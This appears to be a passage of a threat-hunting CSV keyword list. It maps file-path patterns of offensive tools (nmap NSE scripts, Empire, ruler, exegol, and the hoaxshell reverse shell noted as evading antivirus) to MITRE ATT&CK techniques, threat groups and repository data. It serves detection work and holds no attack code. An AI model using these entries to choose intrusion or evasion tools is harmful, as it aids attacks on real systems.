T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/http-drupal-enum-users.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/http-enum.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/http-errors.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/http-exif-spider.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/http-favicon.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/http-feed.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/http-fetch.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/http-fileupload-exploiter.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/http-form-brute.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/http-form-fuzzer.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/http-frontpage-login.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/http-generator.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/http-git.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/http-gitweb-projects-enum.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/http-google-malware.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/http-grep.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/http-headers.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/http-hp-ilo-info.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/http-huawei-hg5xx-vuln.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/http-icloud-findmyiphone.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/http-icloud-sendmsg.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/http-iis-short-name-brute.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/http-iis-webdav-vuln.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/http-internal-ip-disclosure.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/http-joomla-brute.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/http-jsonp-detection.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/http-lexmark-version.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://github.com/nccgroup/nmap-nse-vulnerability-scripts,1,1,N/A,N/A,7,620,64,2022-03-04T09:08:55Z,2021-05-18T15:20:30Z -*/http-lfi.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://github.com/cldrn/nmap-nse-scripts/tree/master/scripts,1,1,N/A,N/A,10,920,383,2022-01-22T18:40:30Z,2011-05-31T05:41:49Z -*/http-litespeed-sourcecode-download.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/HTTP-Login.ps1*,offensive_tool_keyword,empire,Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1109,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,1,N/A,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*/http-ls.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/http-majordomo2-dir-traversal.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/http-malware-host.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/http-mcmp.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/http-methods.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/http-method-tamper.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/http-mobileversion-checker.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/http-nikto-scan.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://github.com/cldrn/nmap-nse-scripts/tree/master/scripts,1,1,N/A,N/A,10,920,383,2022-01-22T18:40:30Z,2011-05-31T05:41:49Z -*/http-ntlm/ntlmtransport*,offensive_tool_keyword,ruler,A tool to abuse Exchange services,T1102.001 - T1201.001 - T1570.002,TA0006,N/A,N/A,Exploitation tools,https://github.com/sensepost/ruler,1,1,N/A,N/A,10,1991,353,2021-02-19T09:28:07Z,2016-08-18T15:05:13Z -*/http-ntlm-info.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/http-open-proxy.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/http-open-redirect.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/http-passwd.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/http-phpmyadmin-dir-traversal.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/http-phpself-xss.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/http-php-version.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/http-proxy-brute.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/http-put.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/http-put-server.py*,greyware_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*/http-qnap-nas-info.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/http-referer-checker.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/http-rfi-spider.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/http-robots.txt.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/http-robtex-reverse-ip.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/http-robtex-shared-ns.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/https_payload.ps1*,offensive_tool_keyword,hoaxshell,An unconventional Windows reverse shell. currently undetected by Microsoft Defender and various other AV solutions. solely based on http(s) traffic,T1203 - T1133 - T1190,TA0001 - TA0002 - TA0006,N/A,N/A,Exploitation tools,https://github.com/t3l3machus/hoaxshell,1,1,N/A,N/A,10,2655,443,2023-06-18T13:26:32Z,2022-07-10T15:36:24Z -*/http-sap-netweaver-leak.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/http-security-headers.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/http-server-header.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/http-shellshock.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/http-sitemap-generator.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/http-slowloris.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A
-*/http-slowloris-check.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A
-*/http-sql-injection.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A
-*/https-redirect.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A
-*/http-stored-xss.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A
